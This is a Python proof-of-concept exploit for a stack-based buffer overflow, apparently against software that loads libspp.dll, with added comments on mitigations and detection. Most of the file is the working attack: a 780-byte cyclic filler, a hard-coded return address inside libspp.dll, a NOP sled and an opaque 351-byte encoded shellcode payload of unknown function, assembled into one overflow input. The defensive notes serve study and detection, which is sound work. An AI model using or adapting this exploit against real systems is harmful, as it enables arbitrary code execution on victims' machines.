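# Proof-of-concept input for a stack-based buffer overflow, kept as the author
# wrote it. The page had collapsed the whole script onto two physical lines, so
# every assignment sat behind the leading '#' and nothing was defined; the
# statement boundaries are restored here with the values unchanged.
#
# Author's notes:
# return address: 0x10090C83 at libspp.dll
# offset: 780
# bad chars: \x00
#
# Layout of the assembled input (see the final assignment):
#   [780 bytes filler][4-byte return address][16 x 0x90][351-byte payload]
#
# Defensive reading: the input depends on a hard-coded address inside
# libspp.dll, so it presumably assumes that module loads at a fixed base and
# that the stack is executable -- confirm against the affected build.
# Building the module with ASLR (/DYNAMICBASE) and DEP (/NXCOMPAT) and
# bounding the vulnerable copy are the mitigations to check for.
# For detection, a single field holding a long cyclic text pattern followed by
# a run of 0x90 bytes is a recognisable signature of this class of input.

# Filler up to the saved return address. It is a non-repeating three-character
# cyclic pattern (Aa0 ... Az9), 26 * 10 * 3 = 780 characters, matching the
# "offset: 780" note above.
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"

# 0x10090C83 written least-significant byte first (little-endian).
return_address = "\x83\x0C\x09\x10"

# Opaque 351-byte machine-code blob supplied by the author. What it does
# cannot be determined from this page; treat it as untrusted and do not run it
# outside an isolated lab.
_malicious = (
    "\xdb\xd0\xd9\x74\x24\xf4\xb8\x1b\x9f\xa8\x5e\x5e\x31\xc9"
    "\xb1\x52\x31\x46\x17\x83\xc6\x04\x03\x5d\x8c\x4a\xab\x9d"
    "\x5a\x08\x54\x5d\x9b\x6d\xdc\xb8\xaa\xad\xba\xc9\x9d\x1d"
    "\xc8\x9f\x11\xd5\x9c\x0b\xa1\x9b\x08\x3c\x02\x11\x6f\x73"
    "\x93\x0a\x53\x12\x17\x51\x80\xf4\x26\x9a\xd5\xf5\x6f\xc7"
    "\x14\xa7\x38\x83\x8b\x57\x4c\xd9\x17\xdc\x1e\xcf\x1f\x01"
    "\xd6\xee\x0e\x94\x6c\xa9\x90\x17\xa0\xc1\x98\x0f\xa5\xec"
    "\x53\xa4\x1d\x9a\x65\x6c\x6c\x63\xc9\x51\x40\x96\x13\x96"
    "\x67\x49\x66\xee\x9b\xf4\x71\x35\xe1\x22\xf7\xad\x41\xa0"
    "\xaf\x09\x73\x65\x29\xda\x7f\xc2\x3d\x84\x63\xd5\x92\xbf"
    "\x98\x5e\x15\x6f\x29\x24\x32\xab\x71\xfe\x5b\xea\xdf\x51"
    "\x63\xec\xbf\x0e\xc1\x67\x2d\x5a\x78\x2a\x3a\xaf\xb1\xd4"
    "\xba\xa7\xc2\xa7\x88\x68\x79\x2f\xa1\xe1\xa7\xa8\xc6\xdb"
    "\x10\x26\x39\xe4\x60\x6f\xfe\xb0\x30\x07\xd7\xb8\xda\xd7"
    "\xd8\x6c\x4c\x87\x76\xdf\x2d\x77\x37\x8f\xc5\x9d\xb8\xf0"
    "\xf6\x9e\x12\x99\x9d\x65\xf5\x66\xc9\x65\x26\x0f\x08\x65"
    "\x29\x74\x85\x83\x43\x9a\xc0\x1c\xfc\x03\x49\xd6\x9d\xcc"
    "\x47\x93\x9e\x47\x64\x64\x50\xa0\x01\x76\x05\x40\x5c\x24"
    "\x80\x5f\x4a\x40\x4e\xcd\x11\x90\x19\xee\x8d\xc7\x4e\xc0"
    "\xc7\x8d\x62\x7b\x7e\xb3\x7e\x1d\xb9\x77\xa5\xde\x44\x76"
    "\x28\x5a\x63\x68\xf4\x63\x2f\xdc\xa8\x35\xf9\x8a\x0e\xec"
    "\x4b\x64\xd9\x43\x02\xe0\x9c\xaf\x95\x76\xa1\xe5\x63\x96"
    "\x10\x50\x32\xa9\x9d\x34\xb2\xd2\xc3\xa4\x3d\x09\x40\xc4"
    "\xdf\x9b\xbd\x6d\x46\x4e\x7c\xf0\x79\xa5\x43\x0d\xfa\x4f"
    "\x3c\xea\xe2\x3a\x39\xb6\xa4\xd7\x33\xa7\x40\xd7\xe0\xc8"
    "\x40"
)

# Despite its name, this is the complete overflow input, not only the payload:
# filler, then the overwritten return address, then sixteen 0x90 bytes, then
# the blob above.
shellcode = buffer + return_address + '\x90' * 16 + _malicious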